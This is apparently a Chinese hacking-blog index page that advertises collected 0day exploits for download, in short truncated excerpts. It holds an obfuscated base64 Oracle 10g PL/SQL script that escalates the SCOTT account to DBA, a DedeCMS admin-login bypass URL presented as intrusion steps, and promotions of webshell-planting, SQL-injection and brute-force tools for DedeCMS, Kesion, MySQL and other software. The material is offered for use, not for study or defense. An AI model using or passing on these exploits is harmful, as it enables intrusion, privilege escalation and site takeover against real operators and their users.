收集许久的0day & exp

大牛们收集的exp及0day,喜欢的同学们自行下载!!

标签:

分享darkcoder归档文件

the file includes the following site sections:bruteforce, c0de, cheatsheets, encryption, exploits, ircbots, misc, others, scanners and tutorialssize: about 150 megs tar.gz file.archive:http:/

标签:

关于mysql爆严重的编译漏洞登录验证问题的说明

6月份,mysql爆了个较严重的编译漏洞登录验证问题,受影响版本有All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable.MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63

标签:

LFI两小技巧-LFI读取文件代码0day

原文作者小冰,QQ:504219610×00 题外话嘿嘿 希望大家多多探讨技术。0×01 PHP Input/Ouput Wrapper 远程包含函数执行命令详细: PHP 的include()函数存在设计缺陷,远程攻击者可以利用这个漏洞可能以WEB 权限执行任意命令。PHP 的一个设计错误,当URI 数据作为’include()’函数的一个参数时,

标签:

DeDeCMS(织梦)变量覆盖0day getshell

dede变量覆盖漏洞phpgetshell

标签:

Oracle的10G版本提升SCOTT为DBA脚本

DECLAREc2gya2Vy NUMBER;BEGINc2gya2Vy := DBMS_SQL.OPEN_CURSOR;DBMS_SQL.PARSE(c2gya2Vy,utl_encode.text_decode('ZGVjbGFyZSBwcmFnbWEgYXV0b25vbW91c190cmFuc2FjdGlvbjsgYmVnaW4gZXhlY3V0ZSBpbW1lZGlhdGUgJ0dSQU5

标签:

最土团购的一些漏洞

 东西压了一年了 现在很多人都有了 听说前两天还有个黑客因为搞这个被河蟹了。。- – 默哀 看看就好了。。第一个是上传漏洞 此漏洞在6月份出的新版本中已经得到修复最土自己写了upload_image上传函数 本身挺安全的但是upload.php没有用这个函数第25行$upext='txt,rar,zip,jpg,jpeg,gif,png,swf,wmv,avi,wma,mp3

标签:

科讯kesion 6.x–7.06 SQL注射漏洞VBS版利用工具第二版

 科讯kesion 6.x – 7.06 SQL 注射漏洞VBS版利用工具第二版前几天 雨中风铃 发了个VBS下利用的,我自己就下载看了下 可以改进的地方很多。我就随便改进了下,希望用的到的朋友可以收藏。第二版改进:1.检测2条漏洞2.解决access数据库也出现什么差异备份等脚本上需要优化的问题。其他也没什么了。下载地址:http://www.tmdsb.com/wp-co

标签:

dedecms5.3-5.7批量getwebshell代码

针对最近出的Dedecms5.3-5.6的最新漏洞写的批量Getwebshell代码,需要的兄弟们下载去吧!!

标签:

DedeCms v5.3-5.7 爆严重安全漏洞 免账号密码直接进入后台

众所周知,因使用简单、客户群多,织梦CMS一直被爆出许多漏洞。今天小编在群里得到织梦官方论坛某版主可靠消息:“DEDECMS爆严重安全漏洞,近期官方会发布相关补丁,望大家及时关注补丁动态。”入侵步骤如下:http://www.xx.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&

标签:

分页:«123456»